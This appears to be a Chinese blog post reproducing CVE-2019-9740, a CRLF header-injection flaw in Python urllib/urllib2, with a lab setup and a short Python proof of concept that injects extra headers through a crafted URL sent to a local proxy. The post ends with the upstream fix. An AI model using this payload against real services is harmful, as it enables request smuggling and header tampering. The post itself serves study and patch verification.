(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

【CVE编号】

CVE-2019-9740

【漏洞名称】

Python urllib CRLF 命令注入漏洞

1【靶标分类】

通用漏洞组件

2【影响版本】

Python 2.x版本至2.7.16版本中的urllib2

Python 3.x版本至3.7.2版本中的urllib

3【漏洞分类】

命令注入

4【漏洞等级】

5【漏洞简介】

Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。urllib是其中的一个用于处理URL的模块。urllib2是其中的一个用于获取URL(统一资源定位符)的模块。

Python 2.x版本至2.7.16版本中的urllib2和Python 3.x版本至3.7.2版本中的urllib存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。

0x01【靶标运行环境】

操作系统:win7专业版

中间件版本:Apache 2.4.23(win32)

编程语言版本:PHP 5.4.45

数据库版本:MySQL 5.5.53

Python版本:2.7.15

工具:burpsuite,phpstudy

 

【靶标利用过程】

工具:burpsuite,phpstudy

  1. 编写poc文件1.py,验证漏洞存在
  2. # The proxy address and port:
    import urllib2
    proxy_info = { 'host' : '127.0.0.1',
                   'port' : 8080
                 }
    
    # We create a handler for the proxy
    proxy_support = urllib2.ProxyHandler({"http" : "http://%(host)s:%(port)d" % proxy_info})
    
    # We create an opener which uses this handler:
    opener = urllib2.build_opener(proxy_support)
    
    # Then we install this opener as the default opener for urllib2:
    urllib2.install_opener(opener)
    
    # Now we can send our HTTP request:
    url = "http://127.0.0.1?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123:8080/test/?test=a"
    htmlpage = urllib2.urlopen(url).read()
    print htmlpage
    
    

 

3、运行poc,这里我们使用urllib2的代理服务到burp上,让我们比较明显的看到漏洞的发生。

 

 

  1. 【解决方案】

官方解决方案

https://github.githistory.xyz/python/cpython/blob/96aeaec64738b730c719562125070a52ed570210/Lib/http/client.py

在putrequest方法上对url进行检查,匹配所有的ascii码在00到32的所有字符,并且同时匹配\x7f字符防止CRLF漏洞的发生。

Referer:

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-484

https://xz.aliyun.com/t/5123

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值